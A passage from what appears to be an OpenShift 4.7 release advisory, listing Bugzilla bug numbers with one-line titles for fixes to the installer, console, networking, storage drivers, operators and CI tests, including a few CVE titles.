required without \u0027https://\u0027\n1894020 - User with edit users cannot deploy images from their own namespace from the developer perspective\n1894025 - OCP 4.5 to 4.6 upgrade for \"aws-ebs-csi-driver-operator\" fails when \"defaultNodeSelector\" is set\n1894041 - [v2v][[Testday]VM import from VMware/RHV] VM import wizard: The target storage class name is not displayed if default storage class is used. \n1894065 - tag new packages to enable TLS support\n1894110 - Console shows wrong value for maxUnavailable and maxSurge when set to 0\n1894144 - CI runs of baremetal IPI are failing due to newer libvirt libraries\n1894146 - ironic-api used by metal3 is over provisioned and consumes a lot of RAM\n1894194 - KuryrPorts leftovers from 4.6 GA need to be deleted\n1894210 - Failed to encrypt OSDs on OCS4.6 installation (via UI)\n1894216 - Improve OpenShift Web Console availability\n1894275 - Fix CRO owners file to reflect node owner\n1894278 - \"database is locked\" error when adding bundle to index image\n1894330 - upgrade channels needs to be updated for 4.7\n1894342 - oauth-apiserver logs many \"[SHOULD NOT HAPPEN] failed to update managedFields for ... OAuthClient ... no corresponding type for oauth.openshift.io/v1, Kind=OAuthClient\"\n1894374 - Dont prevent the user from uploading a file with incorrect extension\n1894432 - [oVirt] sometimes installer timeout on tmp_import_vm\n1894477 - bash syntax error in nodeip-configuration.service\n1894503 - add automated test for Polarion CNV-5045\n1894519 - [OSP] External mode cluster creation disabled for Openstack and oVirt platform\n1894539 - [on-prem] Unable to deploy additional machinesets on separate subnets\n1894645 - Cinder volume provisioning crashes on nil cloud provider\n1894677 - image-pruner job is panicking: klog stack\n1894810 - Remove TechPreview Badge from Eventing in Serverless version 1.11.0\n1894860 - \u0027backend\u0027 CI job passing despite failing tests\n1894910 - Update the node to use the real-time kernel fails\n1894992 - All nightly jobs for e2e-metal-ipi failing due to ipa image missing tenacity package\n1895065 - Schema / Samples / Snippets Tabs are all selected at the same time\n1895099 - vsphere-upi and vsphere-upi-serial jobs time out waiting for bootstrap to complete in CI\n1895141 - panic in service-ca injector\n1895147 - Remove memory limits on openshift-dns\n1895169 - VM Template does not properly manage Mount Windows guest tools check box during VM creation\n1895268 - The bundleAPIs should NOT be empty\n1895309 - [OCP v47] The RHEL node scaleup fails due to \"No package matching \u0027cri-o-1.19.*\u0027 found available\" on OCP 4.7 cluster\n1895329 - The infra index filled with warnings \"WARNING: kubernetes.io/cinder built-in volume provider is now deprecated. The Cinder volume provider is deprecated and will be removed in a future release\"\n1895360 - Machine Config Daemon removes a file although its defined in the dropin\n1895367 - Missing image in metadata DB index.db in disconnected Operator Hub installation. OCP 4.6.1\n1895372 - Web console going blank after selecting any operator to install from OperatorHub\n1895385 - Revert KUBELET_LOG_LEVEL back to level 3\n1895423 - unable to edit an application with a custom builder image\n1895430 - unable to edit custom template application\n1895509 - Backup taken on one master cannot be restored on other masters\n1895537 - [sig-imageregistry][Feature:ImageExtract] Image extract should extract content from an image\n1895838 - oc explain description contains \u0027/\u0027\n1895908 - \"virtio\" option is not available when modifying a CD-ROM to disk type\n1895909 - e2e-metal-ipi-ovn-dualstack is failing\n1895919 - NTO fails to load kernel modules\n1895959 - configuring webhook token authentication should prevent cluster upgrades\n1895979 - Unable to get coreos-installer with --copy-network to work\n1896101 - [cnv][automation] Added negative tests for migration from VMWare and RHV\n1896160 - CI: Some cluster operators are not ready: marketplace (missing: Degraded)\n1896188 - [sig-cli] oc debug deployment configs from a build: local-busybox-1-build not completed\n1896218 - Occasional GCP install failures: Error setting IAM policy for project ...: googleapi: Error 400: Service account ... does not exist., badRequest\n1896229 - Current Rate of Bytes Received and Current Rate of Bytes Transmitted data can not be loaded\n1896244 - Found a panic in storage e2e test\n1896296 - Git links should avoid .git as part of the URL and should not link git:// urls in general\n1896302 - [e2e][automation] Fix 4.6 test failures\n1896365 - [Migration]The SDN migration cannot revert under some conditions\n1896384 - [ovirt IPI]: local coredns resolution not working\n1896446 - Git clone from private repository fails after upgrade OCP 4.5 to 4.6\n1896529 - Incorrect instructions in the Serverless operator and application quick starts\n1896645 - documentationBaseURL needs to be updated for 4.7\n1896697 - [Descheduler] policy.yaml param in cluster configmap is empty\n1896704 - Machine API components should honour cluster wide proxy settings\n1896732 - \"Attach to Virtual Machine OS\" button should not be visible on old clusters\n1896866 - File /etc/NetworkManager/system-connections/default_connection.nmconnection  is incompatible with SR-IOV operator\n1896898 - ovs-configuration.service fails when multiple IPv6 default routes are provided via RAs over the same interface and deployment bootstrap fails\n1896918 - start creating new-style Secrets for AWS\n1896923 - DNS pod /metrics exposed on anonymous http port\n1896977 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters\n1897003 - VNC console cannot be connected after visit it in new window\n1897008 - Cypress: reenable check for \u0027aria-hidden-focus\u0027 rule \u0026 checkA11y test for modals\n1897026 - [Migration] With updating optional network operator configuration, migration stucks on MCO\n1897039 - router pod keeps printing log: template \"msg\"=\"router reloaded\"  \"output\"=\"[WARNING] 316/065823 (15) : parsing [/var/lib/haproxy/conf/haproxy.config:52]: option \u0027http-use-htx\u0027 is deprecated and ignored\n1897050 - [IBM Power] LocalVolumeSet provisions boot partition as PV. \n1897073 - [OCP 4.5] wrong netid assigned to Openshift projects/namespaces\n1897138 - oVirt provider uses depricated cluster-api project\n1897142 - When scaling replicas to zero, Octavia loadbalancer pool members are not updated accordingly\n1897252 - Firing alerts are not showing up in console UI after cluster is up for some time\n1897354 - Operator installation showing success, but Provided APIs are missing\n1897361 - The MCO GCP-OP tests fail consistently on containerruntime tests with \"connection refused\"\n1897412 - [sriov]disableDrain did not be updated in CRD of manifest\n1897423 - Max unavailable and Max surge value are not shown on Deployment Config Details page\n1897516 - Baremetal IPI deployment with IPv6 control plane fails when the nodes obtain both SLAAC and DHCPv6 addresses as they set their hostname to \u0027localhost\u0027\n1897520 - After restarting nodes the image-registry co is in degraded true state. \n1897584 - Add casc plugins\n1897603 - Cinder volume attachment detection failure in Kubelet\n1897604 - Machine API deployment fails: Kube-Controller-Manager can\u0027t reach API: \"Unauthorized\"\n1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers\n1897641 - Baremetal IPI with IPv6 control plane: nodes respond with duplicate packets to ICMP6 echo requests\n1897676 - [CI] [Azure] [UPI] CI failing since 4.6 changes in ignition\n1897830 - [GSS] Unable to deploy OCS 4.5.2 on OCP 4.6.1, cannot `Create OCS Cluster Service`\n1897891 - [RFE][v2v][UI][CNV VM import] Providing error message or/and block migration when vddk-init-image is missing\n1897897 - ptp lose sync openshift 4.6\n1898036 - no network after reboot (IPI)\n1898045 - AWS EBS CSI Driver can not get updated cloud credential secret automatically\n1898097 - mDNS floods the baremetal network\n1898118 - Lack of logs on some image stream tests make hard to find root cause of a problem\n1898134 - Descheduler logs show absolute values instead of percentage when LowNodeUtilization strategy is applied\n1898159 - kcm operator shall pass --allocate-node-cidrs=false to kcm for ovn-kube and openshift-sdn cluster\n1898174 - [OVN] EgressIP does not guard against node IP assignment\n1898194 - GCP: can\u0027t install on custom machine types\n1898238 - Installer validations allow same floating IP for API and Ingress\n1898268 - [OVN]: `make check` broken on 4.6\n1898289 - E2E test: Use KUBEADM_PASSWORD_FILE by default\n1898320 - Incorrect Apostrophe  Translation of  \"it\u0027s\" in Scheduling Disabled Popover\n1898357 - Within the operatorhub details view, long unbroken text strings do not wrap cause breaking display. \n1898407 - [Deployment timing regression] Deployment takes longer with 4.7\n1898417 - GCP: the dns targets in Google Cloud DNS is not updated after recreating loadbalancer service\n1898487 - [oVirt] Node is not removed when VM has been removed from oVirt engine\n1898500 - Failure to upgrade operator when a Service is included in a Bundle\n1898517 - Ironic auto-discovery may result in rogue nodes registered in ironic\n1898532 - Display names defined in specDescriptors not respected\n1898580 - When adding more than one node selector to the sriovnetworknodepolicy, the cni and the device plugin pods are constantly rebooted\n1898613 - Whereabouts should exclude IPv6 ranges\n1898655 - [oVirt] Node deleted in oVirt should cause the Machine to go into a Failed phase\n1898679 - Operand creation form - Required \"type: object\" properties (Accordion component) are missing red asterisk\n1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability\n1898745 - installation failing with CVO reporting openshift-samples not rolled out, samples not setting versions in its ClusterOperator\n1898839 - Wrong YAML in operator metadata\n1898851 - Multiple Pods access the same volume on the same node e2e test cases are missed from aws ebs csi driver e2e test job\n1898873 - Remove TechPreview Badge from Monitoring\n1898954 - Backup script does not take /etc/kubernetes/static-pod-resources on a reliable way\n1899111 - [RFE] Update jenkins-maven-agen to maven36\n1899128 - VMI details screen -\u003e show the warning that it is preferable to have a VM only if the VM actually does not exist\n1899175 - bump the RHCOS boot images for 4.7\n1899198 - Use new packages for ipa ramdisks\n1899200 - In Installed Operators page I cannot search for an Operator by it\u0027s name\n1899220 - Support AWS IMDSv2\n1899350 - configure-ovs.sh doesn\u0027t configure bonding options\n1899433 - When Creating OCS from ocs wizard Step Discover Disks shows Error \"An error occurred Not Found\"\n1899459 - Failed to start monitoring pods once the operator removed from override list of CVO\n1899515 - Passthrough credentials are not immediately re-distributed on update\n1899575 - update discovery burst to reflect lots of CRDs on openshift clusters\n1899582 - update discovery burst to reflect lots of CRDs on openshift clusters\n1899588 - Operator objects are re-created after all other associated resources have been deleted\n1899600 - Increased etcd fsync latency as of OCP 4.6\n1899603 - workers-rhel7 CI jobs failing: Failed to remove rollback: error running rpm-ostree cleanup\n1899627 - Project dashboard Active status using small icon\n1899725 - Pods table does not wrap well with quick start sidebar open\n1899746 - [ovn] error while waiting on flows for pod: OVS sandbox port is no longer active (probably due to a subsequent CNI ADD)\n1899760 - etcd_request_duration_seconds_bucket metric has excessive cardinality\n1899835 - catalog-operator repeatedly crashes with \"runtime error: index out of range [0] with length 0\"\n1899839 - thanosRuler.resources.requests does not take effect in user-workload-monitoring-config confimap\n1899853 - additionalSecurityGroupIDs not working for master nodes\n1899922 - NP changes sometimes influence new pods. \n1899949 - [Platform] Remove restriction on disk type selection for LocalVolumeSet\n1900008 - Fix internationalized sentence fragments in ImageSearch.tsx\n1900010 - Fix internationalized sentence fragments in BuildImageSelector.tsx\n1900020 - Remove \u0026apos; from internationalized keys\n1900022 - Search Page - Top labels field is not applied to selected Pipeline resources\n1900030 - disruption_tests: [sig-imageregistry] Image registry remain available failing consistently\n1900126 - Creating a VM results in suggestion to create a default storage class when one already exists\n1900138 - [OCP on RHV] Remove insecure mode from the installer\n1900196 - stalld is not restarted after crash\n1900239 - Skip \"subPath should be able to unmount\" NFS test\n1900322 - metal3 pod\u0027s toleration for key: node-role.kubernetes.io/master currently matches on exact value matches but should match on Exists\n1900377 - [e2e][automation] create new css selector for active users\n1900496 - (release-4.7) Collect spec config for clusteroperator resources\n1900672 - (s390x) Upgrade from old LUKS to new not working with DASD disks\n1900699 - Impossible to add new Node on OCP 4.6 using large ECKD disks - fdasd issue\n1900759 - include qemu-guest-agent by default\n1900790 - Track all resource counts via telemetry\n1900835 - Multus errors when cachefile is not found\n1900935 - `oc adm release mirror` panic panic: runtime error\n1900989 - accessing the route cannot wake up the idled resources\n1901040 - When scaling down the status of the node is stuck on deleting\n1901057 - authentication operator health check failed when installing a cluster behind proxy\n1901107 - pod donut shows incorrect information\n1901111 - Installer dependencies are broken\n1901200 - linuxptp-daemon crash when enable debug log level\n1901301 - CBO should handle platform=BM without provisioning CR\n1901355 - [Azure][4.7] Invalid vm size from customized compute nodes does not fail properly\n1901363 - High Podready Latency due to timed out waiting for annotations\n1901373 - redundant bracket on snapshot restore button\n1901376 - [on-prem] Upgrade from 4.6 to 4.7 failed with \"timed out waiting for the condition during waitForControllerConfigToBeCompleted: controllerconfig is not completed: ControllerConfig has not completed: completed(false) running(false) failing(true\"\n1901395 - \"Edit virtual machine template\" action link should be removed\n1901472 - [OSP] Bootstrap and master nodes use different keepalived unicast setting\n1901517 - RHCOS 4.6.1 uses a single NetworkManager connection for multiple NICs when using default DHCP\n1901531 - Console returns a blank page while trying to create an operator Custom CR with Invalid Schema\n1901594 - Kubernetes resource CRUD operations.Kubernetes resource CRUD operations Pod \"before all\" hook for \"creates the resource instance\"\n1901604 - CNO blocks editing Kuryr options\n1901675 - [sig-network] multicast when using one of the plugins \u0027redhat/openshift-ovs-multitenant, redhat/openshift-ovs-networkpolicy\u0027 should allow multicast traffic in namespaces where it is enabled\n1901909 - The device plugin pods / cni pod are restarted every 5 minutes\n1901982 - [sig-builds][Feature:Builds] build can reference a cluster service  with a build being created from new-build should be able to run a build that references a cluster service\n1902019 - when podTopologySpreadConstraint strategy is enabled for descheduler it throws error\n1902059 - Wire a real signer for service accout issuer\n1902091 - `cluster-image-registry-operator` pod leaves connections open when fails connecting S3 storage\n1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service\n1902157 - The DaemonSet machine-api-termination-handler couldn\u0027t allocate Pod\n1902253 - MHC status doesnt set RemediationsAllowed = 0\n1902299 - Failed to mirror operator catalog - error: destination registry required\n1902545 - Cinder csi driver node pod should add nodeSelector for Linux\n1902546 - Cinder csi driver node pod doesn\u0027t run on master node\n1902547 - Cinder csi driver controller pod doesn\u0027t run on master node\n1902552 - Cinder csi driver does not use the downstream images\n1902595 - Project workloads list view doesn\u0027t show alert icon and hover message\n1902600 - Container csi-snapshotter in Cinder csi driver needs to use ImagePullPolicy=IfNotPresent\n1902601 - Cinder csi driver pods run as BestEffort qosClass\n1902653 - [BM][IPI] Master deployment failed: No valid host was found. Reason: No conductor service registered which supports driver redfish for conductor group\n1902702 - [sig-auth][Feature:LDAP][Serial] ldap group sync can sync groups from ldap: oc cp over non-existing directory/file fails\n1902746 - [BM][IP] Master deployment failed - Base.1.0.GeneralError: database is locked\n1902824 - failed to generate semver informed package manifest: unable to determine default channel\n1902894 - hybrid-overlay-node crashing trying to get node object during initialization\n1902969 - Cannot load vmi detail page\n1902981 - It should default to current namespace when create vm from template\n1902996 - [AWS] UPI on USGov, bootstrap machine can not fetch ignition file  via s3:// URI\n1903033 - duplicated lines of imageContentSources is seen when mirror release image to local registry\n1903034 - OLM continuously printing debug logs\n1903062 - [Cinder csi driver] Deployment mounted volume have no write access\n1903078 - Deleting VolumeSnapshotClass makes VolumeSnapshot not Ready\n1903107 - Enable vsphere-problem-detector e2e tests\n1903164 - OpenShift YAML editor jumps to top every few seconds\n1903165 - Improve Canary Status Condition handling for e2e tests\n1903172 - Column Management: Fix sticky footer on scroll\n1903186 - [Descheduler] cluster logs should report some info when PodTopologySpreadConstraints strategy is enabled\n1903188 - [Descheduler] cluster log reports failed to validate server configuration\" err=\"unsupported log format:\n1903192 - Role name missing on create role binding form\n1903196 - Popover positioning is misaligned for Overview Dashboard status items\n1903206 - Ingress controller incorrectly routes traffic to non-ready pods/backends. \n1903226 - MutatingWebhookConfiguration pod-identity-webhook does not exclude critical control-plane components\n1903248 - Backport Upstream Static Pod UID patch\n1903277 - Deprovisioning Not Deleting Security Groups [VpcLimitExceeded on e2e-aws tests]\n1903290 - Kubelet repeatedly log the same log line from exited containers\n1903346 - PV backed by FC lun is not being unmounted properly and this leads to IO errors / xfs corruption. \n1903382 - Panic when task-graph is canceled with a TaskNode with no tasks\n1903400 - Migrate a VM which is not running goes to pending state\n1903402 - Nic/Disk on VMI overview should link to VMI\u0027s nic/disk page\n1903414 - NodePort is not working when configuring an egress IP address\n1903424 - mapi_machine_phase_transition_seconds_sum doesn\u0027t work\n1903464 - \"Evaluating rule failed\" for \"record: cluster:kube_persistentvolumeclaim_resource_requests_storage_bytes:provisioner:sum\" and \"record: cluster:kubelet_volume_stats_used_bytes:provisioner:sum\"\n1903639 - Hostsubnet gatherer produces wrong output\n1903651 - Network Policies are not working as expected with OVN-Kubernetes when traffic hairpins back to the same source through a service\n1903660 - Cannot install with Assisted Installer on top of IPv6 since network provider is not started\n1903674 - [sig-apps] ReplicationController should serve a basic image on each replica with a private image\n1903717 - Handle different Pod selectors for metal3 Deployment\n1903733 - Scale up followed by scale down can delete all running workers\n1903917 - Failed to load \"Developer Catalog\" page\n1903999 - Httplog response code is always zero\n1904026 - The quota controllers should resync on new resources and make progress\n1904064 - Automated cleaning is disabled by default\n1904124 - DHCP to static lease script doesn\u0027t work correctly if starting with infinite leases\n1904125 - Boostrap VM .ign image gets added into \u0027default\u0027 pool instead of \u003ccluster-name\u003e-\u003cid\u003e-bootstrap\n1904131 - kuryr tempest plugin test test_ipblock_network_policy_sg_rules fails\n1904133 - KubeletConfig flooded with failure conditions\n1904161 - AlertmanagerReceiversNotConfigured fires unconditionally on alertmanager restart\n1904243 - RHCOS 4.6.1 missing ISCSI initiatorname.iscsi !\n1904244 - MissingKey errors for two plugins using i18next.t\n1904262 - clusterresourceoverride-operator has version: 1.0.0 every build\n1904296 - VPA-operator has version: 1.0.0 every build\n1904297 - The index image generated by \"opm index prune\" leaves unrelated images\n1904305 - Should have scroll-down bar for the field which the values list has too many results under dashboards\n1904385 - [oVirt] registry cannot mount volume on 4.6.4 -\u003e 4.6.6 upgrade\n1904497 - vsphere-problem-detector: Run on vSphere cloud only\n1904501 - [Descheduler] descheduler does not evict any pod when PodTopologySpreadConstraint strategy is set\n1904502 - vsphere-problem-detector: allow longer timeouts for some operations\n1904503 - vsphere-problem-detector: emit alerts\n1904538 - [sig-arch][Early] Managed cluster should start all core operators: monitoring: container has runAsNonRoot and image has non-numeric user (nobody)\n1904578 - metric scraping for vsphere problem detector is not configured\n1904582 - All application traffic broken due to unexpected load balancer change on 4.6.4 -\u003e 4.6.6 upgrade\n1904663 - IPI pointer customization MachineConfig always generated\n1904679 - [Feature:ImageInfo] Image info should display information about images\n1904683 - `[sig-builds][Feature:Builds] s2i build with a root user image` tests use docker.io image\n1904684 - [sig-cli] oc debug ensure it works with image streams\n1904713 - Helm charts with kubeVersion restriction are filtered incorrectly\n1904776 - Snapshot modal alert is not pluralized\n1904824 - Set vSphere hostname from guestinfo before NM starts\n1904941 - Insights status is always showing a loading icon\n1904973 - KeyError: \u0027nodeName\u0027 on NP deletion\n1904985 - Prometheus and thanos sidecar targets are down\n1904993 - Many ampersand special characters are found in strings\n1905066 - QE - Monitoring test cases - smoke test suite automation\n1905074 - QE -Gherkin linter to maintain standards\n1905100 - Too many haproxy processes in default-router pod causing high load average\n1905104 - Snapshot modal disk items missing keys\n1905115 - CI: dev-scripts fail on 02_configure_host: Failed to start network ostestbm\n1905119 - Race in AWS EBS determining whether custom CA bundle is used\n1905128 - [e2e][automation] e2e tests succeed without actually execute\n1905133 - operator conditions special-resource-operator\n1905141 - vsphere-problem-detector: report metrics through telemetry\n1905146 - Backend Tests: TestHelmRepoGetter_SkipDisabled failures\n1905194 - Detecting broken connections to the Kube API takes up to 15 minutes\n1905221 - CVO transitions from \"Initializing\" to \"Updating\" despite not attempting many manifests\n1905232 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them failing due to inconsistent images between CI and OCP\n1905253 - Inaccurate text at bottom of Events page\n1905298 - openshift-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory\n1905299 - OLM fails to update operator\n1905307 - Provisioning CR is missing from must-gather\n1905319 - cluster-samples-operator containers are not requesting required memory resource\n1905320 - csi-snapshot-webhook is not requesting required memory resource\n1905323 - dns-operator is not requesting required memory resource\n1905324 - ingress-operator is not requesting required memory resource\n1905327 - openshift-kube-scheduler initContainer wait-for-host-port is not requesting required resources: cpu, memory\n1905328 - Changing the bound token service account issuer invalids previously issued bound tokens\n1905329 - openshift-oauth-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory\n1905330 - openshift-monitoring init-textfile is not requesting required resources: cpu, memory\n1905338 - QE -Cypress Automation for Add Flow - Database, Yaml, OperatorBacked, PageDetails\n1905347 - QE - Design Gherkin Scenarios\n1905348 - QE - Design Gherkin Scenarios\n1905362 - [sriov] Error message \u0027Fail to update DaemonSet\u0027 always shown in sriov operator pod\n1905368 - [sriov] net-attach-def generated from sriovnetwork cannot be restored once it was deleted\n1905370 - A-Z/Z-A sorting dropdown on Developer Catalog page is not aligned with filter text input\n1905380 - Default to Red Hat/KubeVirt provider if common template does not have provider annotation\n1905393 - CMO uses rbac.authorization.k8s.io/v1beta1 instead of rbac.authorization.k8s.io/v1\n1905404 - The example of \"Remove the entrypoint on the mysql:latest image\" for `oc image append` does not work\n1905416 - Hyperlink not working from Operator Description\n1905430 - usbguard extension fails to install because of missing correct protobuf dependency version\n1905492 - The stalld service has a higher scheduler priority than ksoftirq and rcu{b, c} threads\n1905502 - Test flake - unable to get https transport for ephemeral-registry\n1905542 - [GSS] The \"External\" mode option is not available when the OCP cluster is deployed using Redhat Cluster Assisted Installer 4.6. \n1905599 - Errant change to lastupdatetime in copied CSV status can trigger runaway csv syncs\n1905610 - Fix typo in export script\n1905621 - Protractor login test fails against a 4.7 (nightly) Power cluster\n1905640 - Subscription manual approval test is flaky\n1905647 - Report physical core valid-for-subscription min/max/cumulative use to telemetry\n1905696 - ClusterMoreUpdatesModal component did not get internationalized\n1905748 - with sharded ingresscontrollers, all shards reload when any endpoint changes\n1905761 - NetworkPolicy with Egress policyType is resulting in SDN errors and improper communication within Project\n1905778 - inconsistent ingresscontroller between fresh installed cluster and upgraded cluster\n1905792 - [OVN]Cannot create egressfirewalll with dnsName\n1905889 - Should create SA for each namespace that the operator scoped\n1905920 - Quickstart exit and restart\n1905941 - Page goes to error after create catalogsource\n1905977 - QE ghaekin design scenaio-pipeline metrics ODC-3711\n1906032 - Canary Controller: Canary daemonset rolls out slowly in large clusters\n1906100 - Disconnected cluster upgrades are failing from the cli, when signature retrieval is being blackholed instead of quickly rejected\n1906105 - CBO annotates an existing Metal3 deployment resource to indicate that it is managing it\n1906118 - OCS feature detection constantly polls storageclusters and storageclasses\n1906120 - \u0027Create Role Binding\u0027 form not setting user or group value when created from a user or group resource\n1906121 - [oc] After new-project creation, the kubeconfig file does not set the project\n1906134 - OLM should not create OperatorConditions for copied CSVs\n1906143 - CBO supports log levels\n1906186 - i18n: Translators are not able to translate `this` without context for alert manager config\n1906228 - tuned and openshift-tuned sometimes do not terminate gracefully, slowing reboots\n1906274 - StorageClass installed by Cinder csi driver operator should enable the allowVolumeExpansion to support volume resize. \n1906276 - `oc image append` can\u0027t work with multi-arch image with  --filter-by-os=\u0027.*\u0027\n1906318 - use proper term for Authorized SSH Keys\n1906335 - The lastTransitionTime, message, reason field of operatorcondition should be optional\n1906356 - Unify Clone PVC boot source flow with URL/Container boot source\n1906397 - IPA has incorrect kernel command line arguments\n1906441 - HorizontalNav and NavBar have invalid keys\n1906448 - Deploy using virtualmedia with provisioning network disabled fails - \u0027Failed to connect to the agent\u0027 in ironic-conductor log\n1906459 - openstack: Quota Validation fails if unlimited quotas are given to a project\n1906496 - [BUG] Thanos having possible memory leak consuming huge amounts of node\u0027s memory and killing them\n1906508 - TestHeaderNameCaseAdjust outputs nil error message on some failures\n1906511 - Root reprovisioning tests flaking often in CI\n1906517 - Validation is not robust enough and may prevent to generate install-confing. \n1906518 - Update snapshot API CRDs to v1\n1906519 - Update LSO CRDs to use v1\n1906570 - Number of disruptions caused by reboots on a cluster cannot be measured\n1906588 - [ci][sig-builds] nodes is forbidden: User \"e2e-test-jenkins-pipeline-xfghs-user\" cannot list resource \"nodes\" in API group \"\" at the cluster scope\n1906650 - Cannot collect network policy, EgressFirewall, egressip logs with gather_network_logs\n1906655 - [SDN]Cannot colloect ovsdb-server.log and ovs-vswitchd.log with gather_network_logs\n1906679 - quick start panel styles are not loaded\n1906683 - Kn resources are not showing in Topology if triggers has KSVC and IMC as subscriber\n1906684 - Event Source creation fails if user selects no app group and switch to yaml and then to form\n1906685 - SinkBinding is shown in topology view if underlying resource along with actual source created\n1906689 - user can pin to nav configmaps and secrets multiple times\n1906691 - Add doc which describes disabling helm chart repository\n1906713 - Quick starts not accesible for a developer user\n1906718 - helm chart \"provided by Redhat\" is misspelled\n1906732 - Machine API proxy support should be tested\n1906745 - Update Helm endpoints to use Helm 3.4.x\n1906760 - performance issues with topology constantly re-rendering\n1906766 - localized `Autoscaled` \u0026 `Autoscaling` pod texts overlap with the pod ring\n1906768 - Virtualization nav item is incorrectly placed in the Admin Workloads section\n1906769 - topology fails to load with non-kubeadmin user\n1906770 - shortcuts on mobiles view occupies a lot of space\n1906798 - Dev catalog customization doesn\u0027t update console-config ConfigMap\n1906806 - Allow installing extra packages in ironic container images\n1906808 - [test-disabled] ServiceAccounts should support OIDC discovery of service account issuer\n1906835 - Topology view shows add page before then showing full project workloads\n1906840 - ClusterOperator should not have status \"Updating\" if operator version is the same as the release version\n1906844 - EndpointSlice and EndpointSliceProxying feature gates should be disabled for openshift-sdn kube-proxy\n1906860 - Bump kube dependencies to v1.20 for Net Edge components\n1906864 - Quick Starts Tour: Need to adjust vertical spacing\n1906866 - Translations of Sample-Utils\n1906871 - White screen when sort by name in monitoring alerts page\n1906872 - Pipeline Tech Preview Badge Alignment\n1906875 - Provide an option to force backup even when API is not available. \n1906877 - Placeholder\u0027 value in search filter do not match column heading in Vulnerabilities\n1906879 - Add missing i18n keys\n1906880 - oidcdiscoveryendpoint controller invalidates all TokenRequest API tokens during install\n1906896 - No Alerts causes odd empty Table (Need no content message)\n1906898 - Missing User RoleBindings in the Project Access Web UI\n1906899 - Quick Start - Highlight Bounding Box Issue\n1906916 - Teach CVO about flowcontrol.apiserver.k8s.io/v1beta1\n1906933 - Cluster Autoscaler should have improved mechanisms for group identifiers\n1906935 - Delete resources when Provisioning CR is deleted\n1906968 - Must-gather should support collecting kubernetes-nmstate resources\n1906986 - Ensure failed pod adds are retried even if the pod object doesn\u0027t change\n1907199 - Need to upgrade machine-api-operator module version under cluster-api-provider-kubevirt\n1907202 - configs.imageregistry.operator.openshift.io cluster does not update its status fields after URL change\n1907211 - beta promotion of p\u0026f switched storage version to v1beta1, making downgrades impossible. \n1907269 - Tooltips data are different when checking stack or not checking stack for the same time\n1907280 - Install tour of OCS not available. \n1907282 - Topology page breaks with white screen\n1907286 - The default mhc machine-api-termination-handler couldn\u0027t watch spot instance\n1907287 - [csi-snapshot-webhook] should support both v1beta1 and v1 version when creating volumesnapshot/volumesnapshotcontent\n1907293 - Increase timeouts in e2e tests\n1907295 - Gherkin script for improve management for helm\n1907299 - Advanced Subscription Badge for KMS and Arbiter not present\n1907303 - Align VM template list items by baseline\n1907304 - Use PF styles for selected template card in VM Wizard\n1907305 - Drop \u0027ISO\u0027 from CDROM boot source message\n1907307 - Support and provider labels should be passed on between templates and sources\n1907310 - Pin action should be renamed to favorite\n1907312 - VM Template source popover is missing info about added date\n1907313 - ClusterOperator objects cannot be overriden with cvo-overrides\n1907328 - iproute-tc package is missing in ovn-kube image\n1907329 - CLUSTER_PROFILE env. variable is not used by the CVO\n1907333 - Node stuck in degraded state, mcp reports \"Failed to remove rollback: error running rpm-ostree cleanup -r: error: Timeout was reached\"\n1907373 - Rebase to kube 1.20.0\n1907375 - Bump to latest available 1.20.x k8s - workloads team\n1907378 - Gather netnamespaces networking info\n1907380 - kube-rbac-proxy exposes tokens, has excessive verbosity\n1907381 - OLM fails to deploy an operator if its deployment template contains a description annotation that doesn\u0027t match the CSV one\n1907390 - prometheus-adapter: panic after k8s 1.20 bump\n1907399 - build log icon link on topology nodes cause app to reload\n1907407 - Buildah version not accessible\n1907421 - [4.6.1]oc-image-mirror command failed on \"error: unable to copy layer\"\n1907453 - Dev Perspective -\u003e running vm details -\u003e resources -\u003e no data\n1907454 - Install PodConnectivityCheck CRD with CNO\n1907459 - \"The Boot source is also maintained by Red Hat.\" is always shown for all boot sources\n1907475 - Unable to estimate the error rate of ingress across the connected fleet\n1907480 - `Active alerts` section throwing forbidden error for users. \n1907518 - Kamelets/Eventsource should be shown to user if they have create access\n1907543 - Korean timestamps are shown when users\u0027 language preferences are set to German-en-en-US\n1907610 - Update kubernetes deps to 1.20\n1907612 - Update kubernetes deps to 1.20\n1907621 - openshift/installer: bump cluster-api-provider-kubevirt version\n1907628 - Installer does not set primary subnet consistently\n1907632 - Operator Registry should update its kubernetes dependencies to 1.20\n1907639 - pass dual-stack node IPs to kubelet in dual-stack clusters\n1907644 - fix up handling of non-critical annotations on daemonsets/deployments\n1907660 - Pod list does not render cell height correctly when pod names are too long (dynamic table rerendering issue?)\n1907670 - CVE-2020-27846 crewjam/saml: authentication bypass in saml authentication\n1907671 - Ingress VIP assigned to two infra nodes simultaneously - keepalived process running in pods seems to fail\n1907767 - [e2e][automation]update test suite for kubevirt plugin\n1907770 - Recent RHCOS 47.83 builds (from rhcos-47.83.202012072210-0 on) don\u0027t allow master and worker nodes to boot\n1907792 - The `overrides` of the OperatorCondition cannot block the operator upgrade\n1907793 - Surface support info in VM template details\n1907812 - 4.7 to 4.6 downgrade stuck in clusteroperator storage\n1907822 - [OCP on OSP] openshift-install panic when checking quota with install-config have no flavor set\n1907863 - Quickstarts status not updating when starting the tour\n1907872 - dual stack with an ipv6 network fails on bootstrap phase\n1907874 - QE - Design Gherkin Scenarios for epic ODC-5057\n1907875 - No response when try to expand pvc with an invalid size\n1907876 - Refactoring record package to make gatherer configurable\n1907877 - QE - Automation- pipelines builder scripts\n1907883 - Fix Pipleine creation without namespace issue\n1907888 - Fix pipeline list page loader\n1907890 - Misleading and incomplete alert message shown in pipeline-parameters and pipeline-resources form\n1907892 - Unable to edit application deployed using \"From Devfile\" option\n1907893 - navSortUtils.spec.ts unit test failure\n1907896 - When a workload is added, Topology does not place the new items well\n1907908 - VM Wizard always uses VirtIO for the VM rootdisk regardless what is defined in common-template\n1907924 - Enable madvdontneed in OpenShift Images\n1907929 - Enable madvdontneed in OpenShift System Components Part 2\n1907936 - NTO is not reporting nto_profile_set_total metrics correctly after reboot\n1907947 - The kubeconfig saved in tenantcluster shouldn\u0027t include anything that is not related to the current context\n1907948 - OCM-O bump to k8s 1.20\n1907952 - bump to k8s 1.20\n1907972 - Update 